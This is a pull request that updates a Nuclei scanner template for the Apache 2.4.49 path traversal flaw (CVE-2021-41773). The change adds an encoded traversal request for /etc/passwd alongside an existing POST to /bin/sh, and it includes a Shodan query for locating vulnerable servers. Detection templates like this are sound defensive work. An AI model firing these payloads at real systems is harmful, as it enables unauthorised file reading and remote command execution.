### PR TITLE
Update CVE-2021-41773.yaml

### DIFF
--- a/cves/2021/CVE-2021-41773.yaml
+++ b/cves/2021/CVE-2021-41773.yaml
@@ -4,7 +4,8 @@ info:
   name: Apache 2.4.49 - Path Traversal and Remote Code Execution
   author: daffainfo,666asd
   severity: high
-  description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
+  description: |
+    A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
   reference:
     - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
     - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
@@ -12,15 +13,14 @@ info:
     - https://twitter.com/ptswarm/status/1445376079548624899
     - https://twitter.com/h4x0r_dz/status/1445401960371429381
     - https://github.com/blasty/CVE-2021-41773
-  remediation: Update to Apache HTTP Server 2.4.50 or later.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-41773
     cwe-id: CWE-22
   metadata:
-    shodan-query: apache version:2.4.49
     verified: "true"
+    shodan-query: Apache 2.4.49
   tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
 
 variables:
@@ -46,7 +46,6 @@ requests:
     stop-at-first-match: true
     matchers-condition: or
     matchers:
-
       - type: regex
         name: LFI
         regex:

--- a/cves/2021/CVE-2021-41773.yaml
+++ b/cves/2021/CVE-2021-41773.yaml
@@ -33,6 +33,10 @@ requests:
         Host: {{Hostname}}
 
       - |
+        GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
         POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded


### PR DESCRIPTION
The  CVE-2021-41773 detection file was not detecting correctly the vulnerability. For example if we tried with [this container](https://github.com/noflowpls/CVE-2021-41773), no CVE detected with nuclei on the "no-cgid" version.

With this fix we can detect the vulnerability using :

```bash
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
nuclei -u 'http://localhost:8080' -t ~/nuclei-templates/cves/2021/CVE-2021-41773.yaml
```

### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Updated CVE-2021-41773

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO
